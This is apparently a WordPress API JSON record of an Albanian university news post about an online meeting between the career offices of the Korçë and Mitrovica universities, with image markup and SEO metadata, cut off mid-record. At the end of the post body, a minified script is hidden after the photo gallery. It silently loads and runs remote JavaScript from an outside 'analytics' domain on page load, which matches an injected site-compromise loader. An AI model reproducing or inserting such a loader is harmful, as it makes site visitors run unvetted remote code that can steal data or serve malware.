{"id":35709,"date":"2025-11-19T12:27:55","date_gmt":"2025-11-19T12:27:55","guid":{"rendered":"https:\/\/unkorce.edu.al\/?p=35709"},"modified":"2026-04-30T15:31:30","modified_gmt":"2026-04-30T15:31:30","slug":"takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice","status":"publish","type":"post","link":"https:\/\/unkorce.edu.al\/en\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/","title":{"rendered":"TAKIM DYPAL\u00cbSH MES SEKTORIT T\u00cb KARRIER\u00cbS STUDENTORE DHE ALUMNIT, UNIKO DHE QENDR\u00cbS S\u00cb ZHVILLIMIT T\u00cb KARRIER\u00cbS N\u00cb UNIVERSITETIN \u201cISA BOLETINI\u201d, MITROVIC\u00cb."},"content":{"rendered":"<p>N\u00eb dat\u00ebn 19 n\u00ebntor 2025 Sektori i Karrier\u00ebs Studentore dhe Alumnit n\u00eb Universitetin \u201cFan S. Noli\u201d zhvilloi nj\u00eb takim online me sektorin homolog t\u00eb Universitetit \u201cIsa Boletini\u201d n\u00eb Mitrovic\u00eb, me synimin p\u00ebr t\u00eb thelluar dhe forcuar bashk\u00ebpunimin institucional mes tyre. N\u00eb takim mor\u00ebn pjes\u00eb p\u00ebrgjegj\u00ebsi i Sektorit t\u00eb Karrier\u00ebs Studentore dhe Alumnit, dr. Romeo Terolli, specialistja e Karrier\u00ebs msc. Sara Dita dhe specialistja e Alumnit msc. Xhuliana Sadikaj.<\/p>\n<p>Universiteti \u201cIsa Boletini\u201d i Mitrovic\u00ebs u p\u00ebrfaq\u00ebsua nga Drejtor i Zyr\u00ebs p\u00ebr Informim dhe Komunikim me Publikun, z. Ahmet Jashari dhe zyrtari i lart\u00eb p\u00ebr zhvillim t\u00eb Karrier\u00ebs z. Erzen Isufi.<\/p>\n<p>Gjat\u00eb takimit u zhvillua nj\u00eb diskutim i frytsh\u00ebm, ku t\u00eb dy pal\u00ebt shk\u00ebmbyen ide konkrete p\u00ebr iniciativa t\u00eb p\u00ebrbashk\u00ebta, programe mb\u00ebshtet\u00ebse p\u00ebr student\u00ebt, si dhe programe q\u00eb synojn\u00eb rritjen e mund\u00ebsive profesionale.<\/p>\n<p>Nj\u00eb nd\u00ebr pikat kryesore t\u00eb diskutimit ishte hartimi i nj\u00eb kalendari t\u00eb p\u00ebrbashk\u00ebt t\u00eb zhvillimit t\u00eb veprimtarive, i cili do t\u00eb sh\u00ebrbej\u00eb si mund\u00ebsi p\u00ebr zhvillimin e aktiviteteve t\u00eb ardhshme n\u00eb fush\u00ebn e orientimit n\u00eb karrier\u00eb, praktikave profesionale dhe rrjet\u00ebzimit mes student\u00ebve dhe ish-student\u00ebve t\u00eb t\u00eb dy institucioneve.<\/p>\n<p>Ky hap i r\u00ebnd\u00ebsish\u00ebm synon t\u00eb zgjeroj\u00eb mund\u00ebsit\u00eb p\u00ebr t\u00eb rinjt\u00eb, duke i afruar dy universitetet drejt q\u00ebllimeve t\u00eb p\u00ebrbashk\u00ebta n\u00eb zhvillimin e karrier\u00ebs, shk\u00ebmbimin e p\u00ebrvojave dhe forcimin e rrjetit profesional. Nisma t\u00eb tilla pritet t\u00eb sjellin ndikim pozitiv n\u00eb formimin akademik dhe profesional t\u00eb student\u00ebve, si dhe t\u00eb krijojn\u00eb nj\u00eb model bashk\u00ebpunimi q\u00eb mund t\u00eb zgjerohet edhe me institucione t\u00eb tjera n\u00eb t\u00eb ardhmen.<\/p>\n<p><a ref=\"magnificPopup\" href=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-35710\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5-300x99.jpg\" alt=\"\" width=\"300\" height=\"99\" srcset=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5-300x99.jpg 300w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5-1024x338.jpg 1024w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5-18x6.jpg 18w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg 2048w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a ref=\"magnificPopup\" href=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-2-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-35714\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-2-1-300x117.png\" alt=\"\" width=\"300\" height=\"117\" srcset=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-2-1-300x117.png 300w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-2-1-18x7.png 18w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-2-1.png 609w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><a ref=\"magnificPopup\" href=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/2-5.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-35711\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/2-5-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/2-5-300x225.jpg 300w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/2-5-1024x768.jpg 1024w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/2-5-16x12.jpg 16w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/2-5.jpg 2048w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><a ref=\"magnificPopup\" href=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-1.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-35713\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-1-300x238.jpg\" alt=\"\" width=\"300\" height=\"238\" srcset=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-1-300x238.jpg 300w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-1-1024x812.jpg 1024w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-1-15x12.jpg 15w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-1.jpg 1381w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a ref=\"magnificPopup\" href=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/3-5.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-35712\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/3-5-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/3-5-300x225.jpg 300w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/3-5-1024x768.jpg 1024w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/3-5-16x12.jpg 16w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/3-5.jpg 2048w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a ref=\"magnificPopup\" href=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-4.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-35715\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-4-139x300.jpg\" alt=\"\" width=\"139\" height=\"300\" srcset=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-4-139x300.jpg 139w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-4-473x1024.jpg 473w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-4-6x12.jpg 6w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-4.jpg 739w\" sizes=\"auto, (max-width: 139px) 100vw, 139px\" \/><\/a> <a ref=\"magnificPopup\" href=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-5.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-35716\" src=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-5-138x300.jpg\" alt=\"\" width=\"138\" height=\"300\" srcset=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-5-138x300.jpg 138w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-5-471x1024.jpg 471w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-5-6x12.jpg 6w, https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/Foto-5.jpg 589w\" sizes=\"auto, (max-width: 138px) 100vw, 138px\" \/><\/a><script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>N\u00eb dat\u00ebn 19 n\u00ebntor 2025 Sektori i Karrier\u00ebs Studentore dhe Alumnit n\u00eb Universitetin \u201cFan S. Noli\u201d zhvilloi nj\u00eb takim online me sektorin homolog t\u00eb Universitetit \u201cIsa Boletini\u201d n\u00eb Mitrovic\u00eb, me synimin p\u00ebr t\u00eb thelluar dhe forcuar bashk\u00ebpunimin institucional mes tyre. N\u00eb takim mor\u00ebn pjes\u00eb p\u00ebrgjegj\u00ebsi i Sektorit t\u00eb Karrier\u00ebs Studentore dhe Alumnit, dr. Romeo Terolli,&#8230;<\/p>","protected":false},"author":2,"featured_media":35710,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[26],"tags":[],"class_list":["post-35709","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-sq"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>TAKIM DYPAL\u00cbSH MES SEKTORIT T\u00cb KARRIER\u00cbS STUDENTORE DHE ALUMNIT, UNIKO DHE QENDR\u00cbS S\u00cb ZHVILLIMIT T\u00cb KARRIER\u00cbS N\u00cb UNIVERSITETIN \u201cISA BOLETINI\u201d, MITROVIC\u00cb. - Universiteti &quot;Fan S. Noli&quot;, Kor\u00e7\u00eb<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unkorce.edu.al\/en\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"TAKIM DYPAL\u00cbSH MES SEKTORIT T\u00cb KARRIER\u00cbS STUDENTORE DHE ALUMNIT, UNIKO DHE QENDR\u00cbS S\u00cb ZHVILLIMIT T\u00cb KARRIER\u00cbS N\u00cb UNIVERSITETIN \u201cISA BOLETINI\u201d, MITROVIC\u00cb. - Universiteti &quot;Fan S. Noli&quot;, Kor\u00e7\u00eb\" \/>\n<meta property=\"og:description\" content=\"N\u00eb dat\u00ebn 19 n\u00ebntor 2025 Sektori i Karrier\u00ebs Studentore dhe Alumnit n\u00eb Universitetin \u201cFan S. Noli\u201d zhvilloi nj\u00eb takim online me sektorin homolog t\u00eb Universitetit \u201cIsa Boletini\u201d n\u00eb Mitrovic\u00eb, me synimin p\u00ebr t\u00eb thelluar dhe forcuar bashk\u00ebpunimin institucional mes tyre. N\u00eb takim mor\u00ebn pjes\u00eb p\u00ebrgjegj\u00ebsi i Sektorit t\u00eb Karrier\u00ebs Studentore dhe Alumnit, dr. Romeo Terolli,...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unkorce.edu.al\/en\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/\" \/>\n<meta property=\"og:site_name\" content=\"Universiteti &quot;Fan S. Noli&quot;, Kor\u00e7\u00eb\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/unkorce\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-19T12:27:55+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-30T15:31:30+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2048\" \/>\n\t<meta property=\"og:image:height\" content=\"676\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Brikela Qelemeni\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Brikela Qelemeni\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/\"},\"author\":{\"name\":\"Brikela Qelemeni\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/person\/faa34c53e1891c174ff76279b528558e\"},\"headline\":\"TAKIM DYPAL\u00cbSH MES SEKTORIT T\u00cb KARRIER\u00cbS STUDENTORE DHE ALUMNIT, UNIKO DHE QENDR\u00cbS S\u00cb ZHVILLIMIT T\u00cb KARRIER\u00cbS N\u00cb UNIVERSITETIN \u201cISA BOLETINI\u201d, MITROVIC\u00cb.\",\"datePublished\":\"2025-11-19T12:27:55+00:00\",\"dateModified\":\"2026-04-30T15:31:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/\"},\"wordCount\":319,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/unkorce.edu.al\/#organization\"},\"image\":{\"@id\":\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/\",\"url\":\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/\",\"name\":\"TAKIM DYPAL\u00cbSH MES SEKTORIT T\u00cb KARRIER\u00cbS STUDENTORE DHE ALUMNIT, UNIKO DHE QENDR\u00cbS S\u00cb ZHVILLIMIT T\u00cb KARRIER\u00cbS N\u00cb UNIVERSITETIN \u201cISA BOLETINI\u201d, MITROVIC\u00cb. - Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\",\"isPartOf\":{\"@id\":\"https:\/\/unkorce.edu.al\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg\",\"datePublished\":\"2025-11-19T12:27:55+00:00\",\"dateModified\":\"2026-04-30T15:31:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#primaryimage\",\"url\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg\",\"contentUrl\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg\",\"width\":2048,\"height\":676},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/unkorce.edu.al\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"TAKIM DYPAL\u00cbSH MES SEKTORIT T\u00cb KARRIER\u00cbS STUDENTORE DHE ALUMNIT, UNIKO DHE QENDR\u00cbS S\u00cb ZHVILLIMIT T\u00cb KARRIER\u00cbS N\u00cb UNIVERSITETIN \u201cISA BOLETINI\u201d, MITROVIC\u00cb.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/unkorce.edu.al\/#website\",\"url\":\"https:\/\/unkorce.edu.al\/\",\"name\":\"Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\",\"description\":\"Mir&euml;sevini n&euml; faqen zyrtare!\",\"publisher\":{\"@id\":\"https:\/\/unkorce.edu.al\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/unkorce.edu.al\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/unkorce.edu.al\/#organization\",\"name\":\"Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\",\"url\":\"https:\/\/unkorce.edu.al\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png\",\"contentUrl\":\"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2024\/08\/Logo_e_Universitetit__Fan_Noli_-e1726660879862.png\",\"width\":200,\"height\":120,\"caption\":\"Universiteti \\\"Fan S. Noli\\\", Kor\u00e7\u00eb\"},\"image\":{\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/unkorce\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/person\/faa34c53e1891c174ff76279b528558e\",\"name\":\"Brikela Qelemeni\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/unkorce.edu.al\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6c1805558a9218503040c8b9055763822c6184a1cd600127210a9abbc5aaea04?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6c1805558a9218503040c8b9055763822c6184a1cd600127210a9abbc5aaea04?s=96&d=mm&r=g\",\"caption\":\"Brikela Qelemeni\"},\"url\":\"https:\/\/unkorce.edu.al\/en\/author\/brikela\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"TAKIM DYPAL\u00cbSH MES SEKTORIT T\u00cb KARRIER\u00cbS STUDENTORE DHE ALUMNIT, UNIKO DHE QENDR\u00cbS S\u00cb ZHVILLIMIT T\u00cb KARRIER\u00cbS N\u00cb UNIVERSITETIN \u201cISA BOLETINI\u201d, MITROVIC\u00cb. - Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unkorce.edu.al\/en\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/","og_locale":"en_US","og_type":"article","og_title":"TAKIM DYPAL\u00cbSH MES SEKTORIT T\u00cb KARRIER\u00cbS STUDENTORE DHE ALUMNIT, UNIKO DHE QENDR\u00cbS S\u00cb ZHVILLIMIT T\u00cb KARRIER\u00cbS N\u00cb UNIVERSITETIN \u201cISA BOLETINI\u201d, MITROVIC\u00cb. - Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","og_description":"N\u00eb dat\u00ebn 19 n\u00ebntor 2025 Sektori i Karrier\u00ebs Studentore dhe Alumnit n\u00eb Universitetin \u201cFan S. Noli\u201d zhvilloi nj\u00eb takim online me sektorin homolog t\u00eb Universitetit \u201cIsa Boletini\u201d n\u00eb Mitrovic\u00eb, me synimin p\u00ebr t\u00eb thelluar dhe forcuar bashk\u00ebpunimin institucional mes tyre. N\u00eb takim mor\u00ebn pjes\u00eb p\u00ebrgjegj\u00ebsi i Sektorit t\u00eb Karrier\u00ebs Studentore dhe Alumnit, dr. Romeo Terolli,...","og_url":"https:\/\/unkorce.edu.al\/en\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/","og_site_name":"Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","article_publisher":"https:\/\/www.facebook.com\/unkorce","article_published_time":"2025-11-19T12:27:55+00:00","article_modified_time":"2026-04-30T15:31:30+00:00","og_image":[{"width":2048,"height":676,"url":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg","type":"image\/jpeg"}],"author":"Brikela Qelemeni","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Brikela Qelemeni","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#article","isPartOf":{"@id":"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/"},"author":{"name":"Brikela Qelemeni","@id":"https:\/\/unkorce.edu.al\/#\/schema\/person\/faa34c53e1891c174ff76279b528558e"},"headline":"TAKIM DYPAL\u00cbSH MES SEKTORIT T\u00cb KARRIER\u00cbS STUDENTORE DHE ALUMNIT, UNIKO DHE QENDR\u00cbS S\u00cb ZHVILLIMIT T\u00cb KARRIER\u00cbS N\u00cb UNIVERSITETIN \u201cISA BOLETINI\u201d, MITROVIC\u00cb.","datePublished":"2025-11-19T12:27:55+00:00","dateModified":"2026-04-30T15:31:30+00:00","mainEntityOfPage":{"@id":"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/"},"wordCount":319,"commentCount":0,"publisher":{"@id":"https:\/\/unkorce.edu.al\/#organization"},"image":{"@id":"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#primaryimage"},"thumbnailUrl":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg","inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/","url":"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/","name":"TAKIM DYPAL\u00cbSH MES SEKTORIT T\u00cb KARRIER\u00cbS STUDENTORE DHE ALUMNIT, UNIKO DHE QENDR\u00cbS S\u00cb ZHVILLIMIT T\u00cb KARRIER\u00cbS N\u00cb UNIVERSITETIN \u201cISA BOLETINI\u201d, MITROVIC\u00cb. - Universiteti \"Fan S. Noli\", Kor\u00e7\u00eb","isPartOf":{"@id":"https:\/\/unkorce.edu.al\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#primaryimage"},"image":{"@id":"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#primaryimage"},"thumbnailUrl":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg","datePublished":"2025-11-19T12:27:55+00:00","dateModified":"2026-04-30T15:31:30+00:00","breadcrumb":{"@id":"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uniko-dhe-qendres-se-zhvillimit-te-karrieres-ne-universitetin-isa-boletini-mitrovice\/#primaryimage","url":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg","contentUrl":"https:\/\/unkorce.edu.al\/wp-content\/uploads\/2025\/11\/1-5.jpg","width":2048,"height":676},{"@type":"BreadcrumbList","@id":"https:\/\/unkorce.edu.al\/takim-dypalesh-mes-sektorit-te-karrieres-studentore-dhe-alumnit-uni